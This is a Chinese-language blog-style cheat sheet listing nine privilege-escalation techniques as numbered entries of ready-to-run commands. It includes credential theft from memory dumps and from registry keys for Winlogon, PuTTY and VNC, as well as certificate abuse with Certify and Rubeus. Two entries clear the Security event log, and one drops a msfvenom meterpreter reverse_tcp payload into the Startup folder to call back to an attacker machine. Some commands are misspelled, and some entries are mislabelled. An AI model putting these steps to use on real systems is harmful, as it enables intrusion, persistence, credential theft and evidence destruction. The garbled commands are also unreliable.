特权升级的危险是显而易见的。通过提升权限,攻击者可以绕过网络安全>网络安全措施,从而损害数据完整性、机密性和系统可用性。对于组织而言,这可能会导致数据泄露、系统停机以及潜在的法律和声誉后果。识别权限升级的迹象并部署预防性网络安全>网络安全措施对于保护数字资产并确保只有授权人员才能访问关键系统功能至关重要。
主要有两种类型:垂直升级和水平升级。在垂直升级中,具有较低级别权限的攻击者将其权限提升到较高级别用户(通常是管理员)的权限。这使得他们能够访问受限区域、修改系统配置,甚至部署恶意软件。另一方面,横向升级涉及访问属于对等用户的资源或功能,并利用类似特权帐户的权限。
截至目前,我们一共分享了47种提权方法,本期我们继续整理了9种热门提权方式,本期分享完后,我们一共就分享了56热门提权的方法,而离100种方法也完成一半了,请大家继续查收哟,:
1.Certificate Abuse
域:Yes
Local Admin: Yes
操作系统: Windows
类型: Abusing Certificate
方法:
ceritify.exe request /ca:dc.domain.local\DC-CA /template:User…
Rubeus.exe asktgy /user:CORP\itadmin /certificate:C:\cert.pfx /password:password
2.Password Mining in Memory
域:No
Local Admin: Yes
操作系统: Linux
类型: Enumeration & Hunt
方法:
ps -ef | grep ftp;
gdp -p ftp_id
info proc mappings
q
dump memory /tmp/mem [start] [end]
q
strings /tmp/mem | grep passw
3.Password Mining in Memory
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
In Metasploit (msf > prompt) 输入: use auxiliary/server/capture/http_basic
In Metasploit (msf > prompt) 输入: set uripath x
In Metasploit (msf > prompt) 输入: run
在taskmgr中,右键单击“Image Name”栏中的“iexplore.exe”
并从弹出菜单中选择“创建转储文件”.
strings /root/Desktop/iexplore.DMP | grep “Authorization: Basic”
选择复制 Base64 编码字符串.
在命令提示符下键入: echo -ne [Base64 String] | base64 -d
4.Password Mining in Registry
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
打开命令并输入:
reg query “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v DefaultUsername
在命令提示符下键入:
reg query “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v DefaultPassword
请注意输出中的凭据
在命令提示符下键入:
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42 -v ProxyUsername
在命令提示符下键入:
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42 -v ProxyPassword
注意输出中的凭据
在命令提示符下键入:
reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v Password
在命令提示符下键入:
reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v PasswordViewOnly
记下加密的密码并输入:
C:\Users\User\Desktop\Tools\vncpwd\vncpwd.exe [Encrypted Password]
从输出中记下凭据.
5.Password Mining in General Events via SeAudit
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics
flog -s 10s -n 200
Or
invoke-module LogCleaner.ps1
6.Password Mining in Security Events via SeSecurity
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics
flog -s 10s -n 200
Or
wevtutil cl Security
7.Startup Applications
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
In Metasploit (msf > prompt) 输入: use multi/handler
In Metasploit (msf > prompt) 输入: set payload windows/meterpreter/reverse_tcp
In Metasploit (msf > prompt) 输入: set lhost [Kali VM IP Address]
In Metasploit (msf > prompt) 输入: run
打开另一个命令提示符并键入:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe
将 x.exe 放在“C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”.
8.Password Mining in McAfeeSitelistFiles
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
1.
SharpUp.exe McAfeeSitelistFiles
批注:https://github.com/GhostPack/SharpUp
9.Password Mining in CachedGPPPassword
域名: Y/N
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
SharpUp.exe CachedGPPPassword